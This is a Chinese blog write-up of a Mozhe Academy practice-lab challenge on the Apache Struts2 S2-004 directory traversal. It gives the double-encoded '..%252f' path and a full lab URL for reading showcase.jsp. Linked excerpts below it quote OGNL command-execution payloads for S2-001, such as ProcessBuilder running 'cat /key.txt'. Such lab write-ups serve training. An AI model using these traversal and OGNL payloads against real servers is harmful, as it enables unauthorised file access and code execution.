(墨者学院)Apache Struts2远程代码执行漏洞 S2-004

最新推荐文章于 2024-08-11 22:33:55 发布
最新推荐文章于 2024-08-11 22:33:55 发布
阅读量1.7k 收藏 2
点赞数 2
分类专栏: linux安全 文章标签: Struts2 S2-004
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41453632/article/details/85777563
版权

实验环境:以墨者学院靶机为例

s2-004漏洞为:目录遍历漏洞。

定义:在只是文件交互的一种简单的过程,但是由于文件名可以任意更改而服务器支持“~/”,“../”等特殊符号的目录回溯,从而使攻击者越权访问或者覆盖敏感数据,如网站的配置文件、系统的核心文件,这样的缺陷被命名为路径遍历漏洞。在检查一些常规的Web应用程序时,也常常有发现,只是相对隐蔽而已。

利用方法为:/struts/..%252f..%252f..%252f..%252f 改变目录可以看到各目录下的文件列表(..%252f为../二次url编码得到的)

根据提示key在文件showcase中。
在变例中发现文件showcase.jsp。打开此文件,在网页最下面得到key。
http://219.153.49.228:46035//struts/..%252f..%252f..%252f..%252f..%252f..%252fshowcase.jsp

毕竟话少
关注
专栏目录
墨者学院-Apache Struts2远程代码执行漏洞(S2-015)复现
JimWu的博客
09-04 2037
Apache Struts2远程代码执行漏洞(S2-015)复现 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器 漏洞原理: 如果一个请求与任何其他定义的操作不匹配,它将被匹配,*并且所请求的操作名称将用于以操作名称加载JSP文件。并且,1作为OGNL表达式的威胁值,{ }可以在服务器端执行任意的Java代码。 1.打开靶场,测试是否存在漏洞。 输入/${1+1}.action...
墨者靶场 Apache Struts2远程代码执行漏洞(S2-013)复现
曹振国的博客
06-17 326
漏洞详情: 关于漏洞详情可以查看这篇文章:S2-013 struts2的标签中 <s:a> 和 <s:url> 都有一个 includeParams 属性,可以设置成如下值: 1. none - URL中不包含任何参数(默认) 2. get - 仅包含URL中的GET参数 3. all - 在URL中包含GET和POST参数 当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参数上。 此时<s:a> 或<s:ur
墨者学院_Apache Struts2远程代码执行漏洞(S2-004)复现
cc_de_csdn的博客
08-26 336
s2-004漏洞为:目录遍历漏洞。 定义:在只是文件交互的一种简单的过程,但是由于文件名可以任意更改而服务器支持“~/”,“…/”等特殊符号的目录回溯,从而使攻击者越权访问或者覆盖敏感数据,如网站的配置文件、系统的核心文件,这样的缺陷被命名为路径遍历漏洞。在检查一些常规的Web应用程序时,也常常有发现,只是相对隐蔽而已。 利用方法为:/struts/…%252f…%252f…%252f…%252f...
RCE远程代码执行+奇技淫巧
最新发布
qq_69294474的博客
08-11 336
这道题目的正则要求是你传递的get参数只能是函数嵌套的格式比如a(b(c()))这样。然后在这里我们利用burp suite上传文件,产生临时文件然后用get参数执行代码想办法去执行到那个文件,完成rce!访问的网站的源码就是下图,然后网站的名字是web2.php,网站搭建在Ubuntu下的nginx。现在抓第二个包,然后注意url要改成post上传文件,再把对应的内容复制过去,这个是刚抓到的包。然后上传文件抓第一个包,等会用来伪造,注意是content-type和上传的内容字段。访问的网页的代码如下。
墨者学院-Apache Struts2远程代码执行漏洞(S2-004)复现
JimWu的博客
09-04 359
Apache Struts2远程代码执行漏洞(S2-004)复现 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器 漏洞原理: 目录遍历漏洞,可通过…/返回上个目录。 1.打开靶场,了解S2-004漏洞 2.s2-004是目录遍历漏洞。可通过…/返回上个目录。把/做二次url编码为%252f 3.继续输入…%252f,直到有showcase.jsp。 4.访问http://2...
墨者学院-Apache Struts2远程代码执行漏洞(S2-001)复现
JimWu的博客
09-04 451
Apache Struts2远程代码执行漏洞(S2-001)复现 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器 漏洞原理: 用户提交表单时,后端会将OGNL表达式%{value}进行解析。 1.打开靶场,出现登录界面。 2.测试输入框是否存在漏洞。 输入%{1+1} 3.执行了表达式,证明存在漏洞。 4.执行ls/查看文件。 输入%{ #a=(new java.lang....
0x1F. Apache Struts2远程代码执行漏洞(S2-001)复现
qq_31679787的博客
10-16 342
s2-001:WebWork 2.1+和Struts 2的“ altSyntax”功能允许将OGNL表达式插入文本字符串并进行递归处理。这允许恶意用户通常通过HTML文本字段提交包含OGNL表达式的字符串,如果表单验证失败,该字符串将由服务器执行; 通过账号处输入%{1+2}提交后得到返回值 3可判断出s2-001漏洞; 通过构造poc得到查看根目录,发现key文件; poc: %...
墨者学院-Apache Struts2远程代码执行漏洞(S2-016)复现
JimWu的博客
09-04 1792
Apache Struts2远程代码执行漏洞(S2-016)复现 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器 漏洞原理: 参数action的值redirect以及redirectAction没有正确过滤,导致ognl代码执行。 1.打开靶场,尝试访问/index.action。 证明存在该页面。 2.测试一下是否存在漏洞输入/index.action?redirect:%...
墨者学院-Apache Struts2远程代码执行漏洞(S2-019)复现
JimWu的博客
09-04 1150
Apache Struts2远程代码执行漏洞(S2-019)复现 难易程度:★★ 题目类型:命令执行 使用工具:FireFox浏览器 漏洞原理:默认情况下禁用动态方法调用导致的命令执行。 1.打开靶场,搜索一下S2-019漏洞原理。 2.构造POC,执行命令ls查看文件。 进行url二次编码。 ?debug=command&expression=%23f%3D%23_memberAcces...
在线靶场-墨者-命令执行2星-Apache Struts2远程代码执行漏洞(S2-037)复现
weixin_42079912的博客
08-09 378
漏洞原理是在使用REST插件时,可以传递可用于在服务器端执行任意代码的恶意表达式。 打开靶场网页,等网页加载完。如果没有加载完(靶场环境可能没有完全部署好),可能会影响工具检测结果。 方法一:Struts2漏洞检查工具2017版下载地址:https://www.jb51.net/softs/574358.html。 打开Struts2漏洞检查工具2017版。将靶场网址输入进去,数据提交方式更改...
Apache Struts2远程代码执行漏洞(S2-001)复现
qq_36933272的博客
09-01 833
根据参考链接,密码框输入%(1+1)验证是否存在S-2001漏洞,用户名任意 回显2,存在漏洞,网上寻找poc,ls查看根目录下的文件,发现key.txt%{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{“ls”,"/"})).redirectErrorStream(true).start(), #b=#a.getInputStr...
墨者Apache Struts2远程代码执行漏洞(S2-001)题解
zr1213159840的博客
01-07 451
这题明确说了是什么漏洞,咱们在网上找利用即可,并且参考链接中也提供了相应的信息 官方这个说明说,在表单中填入%{1+1}如果回显为2的话,说明存在这种漏洞,最后我们测试发现,在密码中输入这个式子会回显为2,说明存在这个漏洞,其中的账号随便输 接着拿下面这个exp直接获取到key %{ #a=(new java.lang.ProcessBuilder(new java.lang.String[]{“cat”,"/key.txt"})).redirectErrorStream(true).start(),
Apache Struts2目录遍历漏洞(S2-004)
weixin_47493074的博客
09-27 638
Apache Struts2目录遍历漏洞(S2-004)
墨者靶场 初级:Struts2远程代码执行漏洞S2-004
qq_43233085的博客
01-14 889
墨者靶场 初级:Struts2远程代码执行漏洞S2-004)题目背景介绍实训目标解题方向解题步骤 题目 背景介绍 某日,安全工程师"墨者"对一单位业务系统进行授权扫描,在扫描过程中,发现了某个业务系统使用Apache Struts2框架。不知道运维人员是否修补了漏洞。 实训目标 1、了解Apache Struts2框架; 2、了解Apache Struts2目录遍历漏洞(S2-004); 3、...
0x20.Apache Struts2远程代码执行漏洞(S2-004)复现
qq_31679787的博客
10-16 182
s2-004Struts2调度程序逻辑允许为请求URI提供在Web应用程序的类路径中找到的某些静态资源,这些请求URI具有以“ / struts /”开头的上下文相对路径。 FilterDispatcher(在2.0中)和DefaultStaticContentLoader(在2.1中)具有一个安全漏洞,攻击者可以使用双重编码的url和相对路径来遍历目录结构并下载“静态”内容文件夹之外的文件; ...
Apache Struts2远程代码执行漏洞(S2-004)复现
qq_42283440的博客
09-05 285
1.在只是文件交互的一种简单的过程,但是由于文件名可以任意更改而服务器支持“~/”,“…/”等特殊符号的目录回溯,从而使攻击者越权访问或者覆盖敏感数据,如网站的配置文件、系统的核心文件,这样的缺陷被命名为路径遍历漏洞。在检查一些常规的Web应用程序时,也常常有发现,只是相对隐蔽而已。 利用方法为:/struts/…%252f…%252f…%252f…%252f 改变目录可以看到各目录下的文件列表(...
在线靶场-墨者-命令执行2星-Apache Struts2远程代码执行漏洞(S2-004)复现
weixin_42079912的博客
07-19 218
Apache Struts2远程代码执行漏洞 S2-004为目录遍历漏洞。允许为Web应用程序的类路径中发现的某些静态资源提供具有以“/ struts /”开头的上下文相对路径的请求URI。 /struts/…%252f…%252f…%252f…%252f 改变目录可以看到各目录下的文件列表,看到了有showcase.jsp这个文件。 我们只需要在靶场网页ip地址后面加上/struts/…%252...
墨者学院sql注入 x-f
07-27
墨者学院SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段,通常用于传递客户端IP地址或其他相关信息。在某些情况下,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值